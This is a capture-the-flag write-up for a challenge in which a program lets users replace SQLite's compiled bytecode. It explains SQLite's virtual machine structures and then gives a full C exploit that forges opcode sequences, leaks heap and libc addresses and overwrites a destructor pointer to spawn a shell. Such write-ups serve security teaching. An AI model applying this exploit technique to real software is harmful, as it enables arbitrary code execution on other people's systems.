SQLite of Hand (co-authored with mikit)
Did you know that SQLite3 compiles an SQL query to an internal bytecode and executes it by its bytecode interpreter? (c.f. https://www.hwaci.com/sw/sqlite/arch.html) The situation is quite similar to CPython and other interpreters. There have been numerous exploitation challenges targeting bytecode engines, and this challenge is another example of them.
In the challenge, you are given a binary that takes a bytecode sequence and executes it:
char *buf = mmap((void *)MAP_ADDR, 0x2000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
if (buf == MAP_FAILED)
{
perror("mmap");
return 1;
}
if (sqlite3_open("hello.db", &db) != SQLITE_OK)
{
fprintf(stderr, "Cannot open database: %s\n", sqlite3_errmsg(db));
return 1;
}
if (sqlite3_prepare_v2(db, "select 1;", -1, &stmt, NULL) != SQLITE_OK)
{
fprintf(stderr, "Failed to prepare statement: %s\n", sqlite3_errmsg(db));
sqlite3_close(db);
return 1;
}
printf("size> ");
unsigned n = read_int();
if (n >= (N_OPs * SIZE_OP))
{
puts("too long");
return 1;
}
printf("your bytecode> ");
readn(buf, n);
char *target = malloc(N_OPs * SIZE_OP);
memcpy(target, buf, n);
// adhoc: stmt->aOp = target
void **aOp = (void **)((unsigned long long)stmt + 136);
*aOp = target;
sqlite3_step((sqlite3_stmt *)stmt);Here, stmt is a variable of type sqlite3_stmt *, which is a rename of an internally-used struct Vdbe* , and represents a VM object. Vdbe* object is typically an artifact of compilation of a given SQL by sqlite3_prepare_XX , and it contains compiled bytecodes, memory cells, db file handler, and so on. The binary first opens a database, named “hello.db”, and compiles a SQL query select 1; . The result of the compilation is saved in the stmt* variable.
The tricky thing is the next part. First, it takes a buffer of size n at mmaped-region0x2000000000 and copies it to another heap-buffer. Then, it overwrites the pointer at stmt+136 by the heap-address. Though it’s ad-hoc, with some survey, you may notice that this part is a field aOp in the Vdbe struct, and therefore, that assignment statement is equivalent to stmt->aOp = target. In short, you can change the opcodes of stmt to an arbitrary opcode sequence.
Let us see the internal structure of Vdbe now. SQLite's virtual machine is a variant of register machines, where it is equipped with infinite size of memory cells (called registers), and each opcode achieves some pre-determined operations while manipulating registers.
Thus, Vdbe struct holds the information to achieve this virtual machine. The important part of Vdbe and auxiliary structs are as follows:
typedef struct Vdbe Vdbe;
// https://github.com/sqlite/sqlite/blob/9f53d0c8179a3b69f788bd31749fc7c15092be87/src/vdbeInt.h#L447-L517
struct Vdbe {
/** omitted **/
Mem *aMem; /* The memory locations */
Mem **apArg; /* Arguments to currently executing user function */
VdbeCursor **apCsr; /* One element of this array for each open cursor */
Mem *aVar; /* Values for the OP_Variable opcode. */
/* When allocating a new Vdbe object, all of the fields below should be
** initialized to zero or NULL */
Op *aOp; /* Space to hold the virtual machine's program */
int nOp; /* Number of instructions in the program */
/** omitted **/
}
typedef struct VdbeOp VdbeOp;
// https://github.com/sqlite/sqlite/blob/9f53d0c8179a3b69f788bd31749fc7c15092be87/src/vdbe.h#L54-L93
struct VdbeOp {
u8 opcode; /* What operation to perform */
signed char p4type; /* One of the P4_xxx constants for p4 */
u16 p5; /* Fifth parameter is an unsigned 16-bit integer */
int p1; /* First operand */
int p2; /* Second parameter (often the jump destination) */
int p3; /* The third parameter */
union p4union { /* fourth parameter */
int i; /* Integer value if p4type==P4_INT32 */
void *p; /* Generic pointer */
/* omitted */
} p4;
/* omitted */
};
typedef struct sqlite3_value Mem;
https://github.com/sqlite/sqlite/blob/9f53d0c8179a3b69f788bd31749fc7c15092be87/src/vdbeInt.h#L225-L248
struct sqlite3_value {
union MemValue {
double r; /* Real value used when MEM_Real is set in flags */
i64 i; /* Integer value used when MEM_Int is set in flags */
int nZero; /* Extra zero bytes when MEM_Zero and MEM_Blob set */
const char *zPType; /* Pointer type when MEM_Term|MEM_Subtype|MEM_Null */
FuncDef *pDef; /* Used only when flags==MEM_Agg */
} u;
char *z; /* String or BLOB value */
int n; /* Number of characters in string value, excluding '\0' */
u16 flags; /* Some combination of MEM_Null, MEM_Str, MEM_Dyn, etc. */
u8 enc; /* SQLITE_UTF8, SQLITE_UTF16BE, SQLITE_UTF16LE */
u8 eSubtype; /* Subtype for this value */
/* ShallowCopy only needs to copy the information above */
sqlite3 *db; /* The associated database connection */
int szMalloc; /* Size of the zMalloc allocation */
u32 uTemp; /* Transient storage for serial_type in OP_MakeRecord */
char *zMalloc; /* Space to hold MEM_Str or MEM_Blob if szMalloc>0 */
void (*xDel)(void*);/* Destructor for Mem.z - only valid if MEM_Dyn */
/* omitted */
};As we noted above, a Vdbe object has a sequence of memory cells Mem *aMem and opcodes Op *aOp . A memory cell object (Mem) is a 56-byte object. It is roughly depicted as
0+---------------+----------------+
| Memory value | String pointer |
16+---------------+----------------+
| not important | not important |
32+---------------+----------------+
| not important | not important |
48+---------------+----------------+
| destructor | |
+---------------+----------------+There are roughly five kinds of value types in SQLite3, and in this writeup, we utilize integer and string values. The important note here is that the places where integer value is located and string pointer is located are different, and therefore, even with type confusion, we cannot obtain an arbitrary address read/write.
Various opcodes are implemented in SQLite3 (see https://www.sqlite.org/opcode.html for the full list). We here extract important ones
- OP_IntCopy (p1, p2): copies a memory value from one memory cell to another assuming these memory cells have the integer type (no check)
- OP_Concat(p1, p2, p3): string concatenation p3 := p2 + p1. It can trigger libc's
malloc. - OP_AddImm(reg, imm): reg += imm
- OP_String(len, reg, _, str): reg := str
- OP_Goto(_, addr): pc := addr
The challenges of pwning SQLite3 bytecode interpreter are (as far as I know)
- No ArrayBuffer; We cannot do buf[arbitrary_addr] = arbitrary_value easily (no easy arbitrary address write (AAW))
- Illegal OP_IntCopy cannot overwrite the string buffer’s address, as there are located in a different offset in a single memory cell (+0 vs +8).
Rough overview of my exploitation strategy is to leak the heap address, and creates a fake Op sequence in the heap.
Since the offset to the op sequence is always the same, so we can jump to the fake Op sequence with 100 percent.
Since we have leaked the heap address in the first stage, in the second stage (the fake Op sequence), we can create an opcode with the heap address.
Using this primitive, we can leak the libc address.
Finally, we overwrite the memory cell's destructor function pointer to libc's system, and utilize OP_VCheck opcode, we can achieve system("/bin/sh").
#include <sqlite3.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#include "mylib.c"
#define MAP_ADDR 0x2000000000
#define MEM_Dyn 0x1000
int main()
{
Op *cur;
Op *buf = mmap((void *)MAP_ADDR, 0x10000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
if (buf == MAP_FAILED)
{
perror("mmap");
return 1;
}
printf("buf: %p\n", buf);
Op *target = malloc(0x100 * sizeof(Op));
// **main**
cur = buf;
// aux
i64 value = 0x4142434445;
Op2(cur++, OP_Init, 0, 1);
// leak heap address
// 10: addr of heap
// 11: addr of libc
// 12: addr of stack
int RHEAP = 10;
int RLIBC = 11;
int RSTACK = 12;
int RSQLITE = 13;
char *dummy = (char *)(buf + 0xf0);
Op *fake_op2 = buf + 0x20; // for leaking sqlite
Op *fake_op3 = buf + 0x30; // for leaking libc
Op *fake_op4 = buf + 0x80; // for executing system("/bin/sh")
memcpy(dummy, "/bin/sh\x00", 8);
char *fake_memorycell = dummy + 8;
memcpy(dummy + 8, &dummy, 8);
memcpy(dummy + 16, "\xff\xff\xff\xff", 4);
short flags = MEM_Dyn;
memcpy(dummy + 20, &flags, 2);
short remindar = 0;
memcpy(dummy + 22, &remindar, 2);
dummy += 0x18;
memcpy(dummy, "dummy!!\x00", 8);
// 1. leak heap address
Op3(cur++, OP_IntCopy, 2, RHEAP, 1);
// create leak libc address Ops
Op4(cur++, OP_String, 0x10, 1, 0, fake_op2, P4_STATIC);
Op2(cur++, OP_Pack, RHEAP, 2);
Op3(cur++, OP_Concat, 2, 1, 13);
Op4(cur++, OP_String, 0x800, 1, 0, fake_op2 + 1, P4_STATIC);
Op3(cur++, OP_Concat, 1, 13, 0);
Op2(cur++, OP_Goto, 0, 260); // jump to fake op2
// leak sqlite's lib address
// values is dummy ( to be overwritten above)
cur = fake_op2;
Op4(cur++, OP_Int64, 0, RSQLITE, 0, (u8 *)&value, P4_INT64);
Op2(cur++, OP_AddImm, RSQLITE, -0x104a80);
// GOT(getenv)
Op2(cur++, OP_IntCopy, RSQLITE, 1);
Op2(cur++, OP_AddImm, 1, 1060864);
Op2(cur++, OP_Pack, 1, 2);
Op4(cur++, OP_String, 0x18, 1, 0, (u64)fake_op3 - 0x8, P4_STATIC);
Op3(cur++, OP_Concat, 2, 1, 13);
Op4(cur++, OP_String, 0x900, 1, 0, fake_op3 + 1, P4_STATIC);
Op3(cur++, OP_Concat, 1, 13, 0);
Op2(cur++, OP_Goto, 0, 349); // jump to fake op3
// leak libc's address
cur = fake_op3;
Op4(cur++, OP_Int64, 0, RLIBC, 0, (u8 *)&value, P4_INT64);
Op2(cur++, OP_AddImm, RLIBC, -296864);
int base = 0x26aa0;
int system_offset = 0x58740;
int binsh_offset = 0x1b75aa;
// u (dummy)
Op4(cur++, OP_String, 72, 9, 0, dummy, P4_STATIC);
Op4(cur++, OP_String, 0x10 + 8 /* db */ + 4 /* szMalloc */ + 4 /* uTemp */ + 8 /* zMalloc */, 1, 0, (u64)fake_memorycell, P4_STATIC);
Op3(cur++, OP_Concat, 1, 9, 9);
Op2(cur++, OP_IntCopy, RLIBC, 1);
Op2(cur++, OP_AddImm, 1, system_offset);
Op2(cur++, OP_Pack, 1, 13);
Op3(cur++, OP_Concat, 13, 9, 9);
Op4(cur++, OP_String, 0x900, 1, 0, dummy, P4_STATIC);
Op3(cur++, OP_Concat, 1, 9, 9);
Op2(cur++, OP_VCheck, 0, 2016);
Op2(cur++, OP_ResultRow, 9, 1);
Op2(cur++, OP_Halt, 0, 0);
// save buf to a file named "pwn"
FILE *fp = fopen("pwn", "wb");
fwrite(buf, 0x100 * sizeof(Op), 1, fp);
fclose(fp);
return 0;
}